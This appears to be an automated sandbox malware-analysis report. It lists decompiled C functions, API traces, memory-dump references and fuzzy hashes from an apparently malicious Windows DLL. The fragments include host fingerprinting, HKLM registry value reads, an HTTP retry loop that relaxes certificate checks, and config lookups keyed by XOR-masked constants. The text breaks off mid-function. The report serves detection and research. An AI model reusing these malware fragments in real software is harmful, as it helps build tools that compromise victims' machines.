Function 012B144D, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E012B144D(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E012B3DA0(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x12bd2e0; // 0x3f8a5a8
						_t20 = _t68 + 0x12be1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E012B47EB(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x012b1453
0x012b1456
0x012b1466
0x012b146f
0x012b1473
0x012b1541
0x012b1547
0x012b1547
0x012b148d
0x012b1492
0x012b1496
0x012b149c
0x012b14a1
0x012b14a8
0x012b14b7
0x012b14b7
0x012b14bb
0x012b14bd
0x012b14c9
0x012b14d4
0x012b14df
0x012b14e3
0x012b14ed
0x012b14f1
0x012b14f3
0x012b14f8
0x012b14ff
0x012b150f
0x012b150f
0x012b14f8
0x012b14f1
0x012b1511
0x012b1516
0x012b151b
0x012b151b
0x012b151e
0x012b1527
0x012b152c
0x012b152c
0x012b1531
0x012b1536
0x012b1536
0x012b1531
0x012b14bb
0x012b1538
0x012b153e
0x00000000

APIs

Part of subcall function 012B3DA0: SysAllocString.OLEAUT32(80000002), ref: 012B3DFD
Part of subcall function 012B3DA0: SysFreeString.OLEAUT32(00000000), ref: 012B3E63

SysFreeString.OLEAUT32(?), ref: 012B152C
SysFreeString.OLEAUT32(012B28D9), ref: 012B1536

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 14cee8f69456a32437ddc3238f2822946b8601dec56c2a61e42a4aa50e1e6094
Instruction ID: 5c416c91e6ec5c1e4332f33393049210c70a94046c25204afe031bf806c21e8f
Opcode Fuzzy Hash: 14cee8f69456a32437ddc3238f2822946b8601dec56c2a61e42a4aa50e1e6094
Instruction Fuzzy Hash: 25313D7651011AEFCB15DF68E8D8CEBBB79FBC97807144658FA069B210D231DDA1CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 012B58AE, Relevance: 3.0, APIs: 2, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(012B258B), ref: 012B58C7

Part of subcall function 012B144D: SysFreeString.OLEAUT32(?), ref: 012B152C

SysFreeString.OLEAUT32(00000000), ref: 012B5908

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 022241e9859ea65090b4b7d33f5665e6ea1683ff33e065c94faf33026e5f389e
Instruction ID: bd4937483c0aaf6dea477b3a59aad252709b677f28789bbf23d50e3d9847caa5
Opcode Fuzzy Hash: 022241e9859ea65090b4b7d33f5665e6ea1683ff33e065c94faf33026e5f389e
Instruction Fuzzy Hash: 48016D3651015ABFDB119FA8E849CEF7BB8EF48360B014422FA05E7120D7309E25CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 012B1BBF, Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E012B1BBF(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E012B75F6(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E012B4AAB(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}

0x012b1bc4
0x012b1bcf
0x012b1bd1
0x012b1bd7
0x012b1bd9
0x012b1bde
0x012b1be7
0x012b1beb
0x012b1bf4
0x012b1bf8
0x012b1c07
0x012b1bfa
0x012b1bfb
0x012b1c00
0x012b1c00
0x012b1bf8
0x012b1beb
0x012b1c10

APIs

GetComputerNameExA.KERNEL32(00000003,00000000,012B4531,7519F710,00000000,?,?,012B4531), ref: 012B1BD7

Part of subcall function 012B75F6: RtlAllocateHeap.NTDLL(00000000,00000000,012B4F70), ref: 012B7602

GetComputerNameExA.KERNEL32(00000003,00000000,012B4531,012B4532,?,?,012B4531), ref: 012B1BF4

Part of subcall function 012B4AAB: RtlFreeHeap.NTDLL(00000000,00000000,012B5012,00000000,?,?,00000000), ref: 012B4AB7

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: ComputerHeapName$AllocateFree
String ID:
API String ID: 187446995-0
Opcode ID: 51d3eccff387fc94ea7be4aa6471e6e4037fe7e835390347cbf0beda0e6de59f
Instruction ID: 6b0fd20580922f9cb057051e67d24a82c5265460b6ab4a251d7dc31bbaad6ce4
Opcode Fuzzy Hash: 51d3eccff387fc94ea7be4aa6471e6e4037fe7e835390347cbf0beda0e6de59f
Instruction Fuzzy Hash: E2F0B426610146BBEB11D6999D94FEF3BBDDBC5791F100055EA01D7140EA70DA018771

Uniqueness

Uniqueness Score: -1.00%

Function 012B18D8, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x12bd274) == 0) {
						E012B4450();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x12bd274) == 1) {
						_t10 = E012B262F(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}

0x012b18df
0x012b18e0
0x012b18e3
0x012b1915
0x012b1917
0x012b1917
0x012b18e5
0x012b18e6
0x012b18fb
0x012b1902
0x012b1904
0x012b1904
0x012b1902
0x012b18e6
0x012b191f

APIs

InterlockedIncrement.KERNEL32(012BD274), ref: 012B18ED

Part of subcall function 012B262F: HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,012B1900,?), ref: 012B2642

InterlockedDecrement.KERNEL32(012BD274), ref: 012B190D

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: 29c9ad5d89e93a1dbbc1a436880b2d3998558c07dc9525504f709ef6ecc073d0
Instruction ID: cd09e3e00a7bb4ec9320a910088b7799b2cfa0cd562d742da1c87b34aebc06ce
Opcode Fuzzy Hash: 29c9ad5d89e93a1dbbc1a436880b2d3998558c07dc9525504f709ef6ecc073d0
Instruction Fuzzy Hash: 71E02639370AA7B78F323ABAB8D87EBAE10AB117D4F004514F6E0C102BC210C8F18391

Uniqueness

Uniqueness Score: -1.00%

Function 012B1F72, Relevance: 2.6, APIs: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E012B1F72(intOrPtr _a4, signed int _a8) {
				long _v8;
				long _v12;
				char _v16;
				void* _t14;
				long _t15;
				char* _t17;
				intOrPtr* _t19;
				signed int _t22;

				_t19 = __imp__; // 0x6fe5e700
				_t22 =  ~_a8;
				_v12 = 0;
				asm("sbb esi, esi");
				while(1) {
					_v8 = 0;
					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed
					if(_t14 != 0) {
						break;
					}
					_t15 = GetLastError();
					_v8 = _t15;
					if(_t15 != 0x2f8f) {
						if(_t15 == 0x2f00) {
							continue;
						}
					} else {
						_v16 = 0x3300;
						if(_v12 == 0) {
							_t17 =  &_v16;
							__imp__(_a4, 0x1f, _t17, 4);
							if(_t17 == 0) {
								_v8 = GetLastError();
							} else {
								_v12 = 1;
								continue;
							}
						}
					}
					L9:
					return _v8;
				}
				goto L9;
			}

0x012b1f79
0x012b1f86
0x012b1f88
0x012b1f8b
0x012b1fd0
0x012b1fd8
0x012b1fde
0x012b1fe2
0x00000000
0x00000000
0x012b1f8f
0x012b1f95
0x012b1f9d
0x012b1fce
0x00000000
0x00000000
0x012b1f9f
0x012b1f9f
0x012b1fa9
0x012b1fad
0x012b1fb6
0x012b1fbe
0x012b1fec
0x012b1fc0
0x012b1fc0
0x00000000
0x012b1fc0
0x012b1fbe
0x012b1fa9
0x012b1fef
0x012b1ff6
0x012b1ff6
0x00000000

APIs

GetLastError.KERNEL32 ref: 012B1F8F
GetLastError.KERNEL32(?,?,?,?,012B46B9,00000000,?,?), ref: 012B1FE6

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 195164c7ea1494a5521219329b4ae351398ea0b719decfdb7ad5946ff35f2c12
Instruction ID: 6ee7099f83c2b078bf0889bb21b40f0de8c0dc2440274f8373a78b325a5ba18a
Opcode Fuzzy Hash: 195164c7ea1494a5521219329b4ae351398ea0b719decfdb7ad5946ff35f2c12
Instruction Fuzzy Hash: 81019231910309FBDF219F9AF8C8DEE7FB8EB95790F108026E605E2245D7708664DB60

Uniqueness

Uniqueness Score: -1.00%

Function 012B1E47, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E012B1E47(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x12bd2e0; // 0x3f8a5a8
				_t4 = _t15 + 0x12be39c; // 0x5248944
				_t20 = _t4;
				_t6 = _t15 + 0x12be124; // 0x650047
				_t17 = E012B144D(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E012B25D6(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x012b1e51
0x012b1e58
0x012b1e59
0x012b1e5a
0x012b1e5b
0x012b1e61
0x012b1e66
0x012b1e66
0x012b1e70
0x012b1e82
0x012b1e89
0x012b1eb7
0x012b1e8b
0x012b1e8d
0x012b1e92
0x012b1eb4
0x012b1e94
0x012b1e97
0x012b1e9e
0x012b1ea3
0x012b1ea5
0x012b1ea5
0x012b1eaa
0x012b1eaa
0x012b1e92
0x012b1ebe

APIs

Part of subcall function 012B144D: SysFreeString.OLEAUT32(?), ref: 012B152C

Part of subcall function 012B25D6: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,012B474F,004F0053,00000000,?), ref: 012B25DF
Part of subcall function 012B25D6: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,012B474F,004F0053,00000000,?), ref: 012B2609
Part of subcall function 012B25D6: memset.NTDLL ref: 012B261D

SysFreeString.OLEAUT32(00000000), ref: 012B1EAA

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: 498dc37341aaa8993312338bbe809cbfbb5763a972fabd027974ad783efd2bbe
Instruction ID: e00a3d9ef35f239b1366fc43b1e355c20431776ed57d34c7cffb7a1da23e13cf
Opcode Fuzzy Hash: 498dc37341aaa8993312338bbe809cbfbb5763a972fabd027974ad783efd2bbe
Instruction Fuzzy Hash: 7D01713292011ABFDB119FA8EC85DEBBBB9FB04390F004525EA01E7161D770AD25C791

Uniqueness

Uniqueness Score: -1.00%

Function 6ED4146E, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,6ED8A0D4,00000000), ref: 6ED414AF

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1bd591f8b129cf6d3840aa22dc41468249be21ffab8ad085893133c5eb2ee0b8
Instruction ID: 795e85ff78a4915662b66d34ffb62afe0175bcafcb6ce79b8c6b93588b7a4765
Opcode Fuzzy Hash: 1bd591f8b129cf6d3840aa22dc41468249be21ffab8ad085893133c5eb2ee0b8
Instruction Fuzzy Hash: B6F0E93164492DDFFB415BF68814F5B3758AF627B0B118521EC6CD61C4CB30D92986F0

Uniqueness

Uniqueness Score: -1.00%

Function 6ED05C56, Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(?), ref: 6ED05C69

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 95c34921fb13d060e93b1d483743e69281205767c479edd537e651ac9a84d738
Instruction ID: d6c5750fe2b3dc34fa5f338dd46a0b1e5c080baa04b3377b3318860b9a826485
Opcode Fuzzy Hash: 95c34921fb13d060e93b1d483743e69281205767c479edd537e651ac9a84d738
Instruction Fuzzy Hash: E1D0C970018F04EFEF849F44E9147263BA4F707316F110128E40D832D8D7355462CA44

Uniqueness

Uniqueness Score: -1.00%

Function 012BAB31, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012BAB31() {

				E012BABF6(0x12bc344, 0x12bd134); // executed
				goto __eax;
			}

0x012bab28
0x012bab2f

APIs

___delayLoadHelper2@8.DELAYIMP ref: 012BAB28

Part of subcall function 012BABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 012BAC6F

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 98faf324a8e08ba5a8e4ede63d92cfd8994a38e0e97d565314ce6cbdfb1fcab2
Instruction ID: 59f86a298da25d647a68293f8c31b265f16e4ca4e5d3ce1113b3c0d6ebe8eaa9
Opcode Fuzzy Hash: 98faf324a8e08ba5a8e4ede63d92cfd8994a38e0e97d565314ce6cbdfb1fcab2
Instruction Fuzzy Hash: 56B0128127B103BE3544524D1DE3CFB150EC0E0BE0324C81FF810C6100F8A10D410131

Uniqueness

Uniqueness Score: -1.00%

Function 012BAB16, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012BAB16() {

				E012BABF6(0x12bc344, 0x12bd124); // executed
				goto __eax;
			}

0x012bab28
0x012bab2f

APIs

___delayLoadHelper2@8.DELAYIMP ref: 012BAB28

Part of subcall function 012BABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 012BAC6F

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 50ef9b33a676e3ef700db17c5bc80493e490c864d02a255ffae040e2683a13e3
Instruction ID: 52b086ff77b86c1726f8a167cf1dff3deaadd743bba0dc97d97795e0bb55bd37
Opcode Fuzzy Hash: 50ef9b33a676e3ef700db17c5bc80493e490c864d02a255ffae040e2683a13e3
Instruction Fuzzy Hash: ADB012A1279103BD310812491DE3DFF154DC0F0BD0324881FF850D5000F8A25D410031

Uniqueness

Uniqueness Score: -1.00%

Function 012B75F6, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B75F6(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x12bd270, 0, _a4); // executed
				return _t2;
			}

0x012b7602
0x012b7608

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,012B4F70), ref: 012B7602

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4b51ee2baa327ca95e1f780e8b219bc33e602db118f34b81ed51e0a7a680f610
Instruction ID: 397a5fae7fdc3d3c55128fa2b01fa9e781fae54ee10dc097c46dba2456f04633
Opcode Fuzzy Hash: 4b51ee2baa327ca95e1f780e8b219bc33e602db118f34b81ed51e0a7a680f610
Instruction Fuzzy Hash: 1FB01271004104ABCE314B50FE4CF057B31B750710F014421B20440068C2314834EB14

Uniqueness

Uniqueness Score: -1.00%

Function 012B4AAB, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B4AAB(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x12bd270, 0, _a4); // executed
				return _t2;
			}

0x012b4ab7
0x012b4abd

APIs

RtlFreeHeap.NTDLL(00000000,00000000,012B5012,00000000,?,?,00000000), ref: 012B4AB7

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 76ac1400d5c5df5065383535d85302393eb750e121e16c3016b36385c4653e87
Instruction ID: cc173b0cb50a9e2ce4021278467b28cf6a9f98f1403d7b0e56b35cc999129021
Opcode Fuzzy Hash: 76ac1400d5c5df5065383535d85302393eb750e121e16c3016b36385c4653e87
Instruction Fuzzy Hash: 88B012B1100100ABCE314B90FF4CF05BA31B750700F004421B30400078C2314830FB15

Uniqueness

Uniqueness Score: -1.00%

Function 012B4B28, Relevance: 1.3, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B4B28(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E012B63F5(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x12bd270, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E012B1E47(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}

0x012b4b28
0x012b4b30
0x012b4b47
0x012b4b62
0x012b4b66
0x012b4b6b
0x012b4b6d
0x012b4b7f
0x012b4b8b
0x012b4b6f
0x012b4b6f
0x012b4b74
0x012b4b79
0x012b4b79
0x012b4b6d
0x012b4b91
0x012b4b95
0x012b4b95
0x012b4b3c
0x012b4b41
0x012b4b45
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 012B1E47: SysFreeString.OLEAUT32(00000000), ref: 012B1EAA

HeapFree.KERNEL32(00000000,00000000,00000000,80000002,7519F710,?,00000000,?,00000000,?,012B506B,?,004F0053,05249370,00000000,?), ref: 012B4B8B

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: Free$HeapString
String ID:
API String ID: 3806048269-0
Opcode ID: 813a5e635f955c903988654da0b21be060098694fe8cffe1ae7ebd140669275a
Instruction ID: 29e92b53b8c03d2be18faa42400cbecc698ca965f2ad5c5763bb8c71fd16e4ad
Opcode Fuzzy Hash: 813a5e635f955c903988654da0b21be060098694fe8cffe1ae7ebd140669275a
Instruction Fuzzy Hash: 5901283251065ABBDB22AF58DC85FEA7B65EF18790F048024FF099A121E731C960DB90

Uniqueness

Uniqueness Score: -1.00%

Function 012B5DDA, Relevance: 1.3, APIs: 1, Instructions: 26
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B5DDA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20) {
				void* _t17;

				if(_a4 == 0) {
					L2:
					return E012B1138(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
				}
				_t17 = E012B58AE(_a4, _a8, _a12, _a16, _a20); // executed
				if(_t17 != 0) {
					goto L2;
				}
				return _t17;
			}

0x012b5de2
0x012b5dfc
0x00000000
0x012b5e18
0x012b5df3
0x012b5dfa
0x00000000
0x00000000
0x012b5e1f

APIs

lstrlenW.KERNEL32(?,?,?,012B29F4,3D012BC0,80000002,012B2197,012B258B,74666F53,4D4C4B48,012B258B,?,3D012BC0,80000002,012B2197,?), ref: 012B5DFF

Part of subcall function 012B58AE: SysAllocString.OLEAUT32(012B258B), ref: 012B58C7
Part of subcall function 012B58AE: SysFreeString.OLEAUT32(00000000), ref: 012B5908

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFreelstrlen
String ID:
API String ID: 3808004451-0
Opcode ID: 030c748e5b19ec0086c4253d273e488321d8f82d0f6a124bd5730cf8afee8f72
Instruction ID: 243e9f790ee45e9e603bbf6f83326d51c892de36f277faf69ebb05ce7908f635
Opcode Fuzzy Hash: 030c748e5b19ec0086c4253d273e488321d8f82d0f6a124bd5730cf8afee8f72
Instruction Fuzzy Hash: BCF0923202020EBFDF165F94EC45EEA3F6AEF18790F048414BA1458071D732C5B1EBA0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 012B4C40, Relevance: 12.3, APIs: 8, Instructions: 258
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E012B4C40(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t103;
				intOrPtr _t121;

				_t104 = __ecx;
				_t28 =  *0x12bd2dc; // 0x69b25f44
				if(E012B5657( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0x12bd310 = _v8;
				}
				_t33 =  *0x12bd2dc; // 0x69b25f44
				if(E012B5657( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x12bd2dc; // 0x69b25f44
				if(E012B5657( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x12bd270, 0, _v16);
					goto L69;
				} else {
					_t103 = _v12;
					if(_t103 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x12bd2dc; // 0x69b25f44
						_t45 = E012B3BB8(_t104, _t103, _t98 ^ 0x7895433b);
					}
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x12bd278 = _v8;
						}
					}
					if(_t103 == 0) {
						_t46 = 0;
					} else {
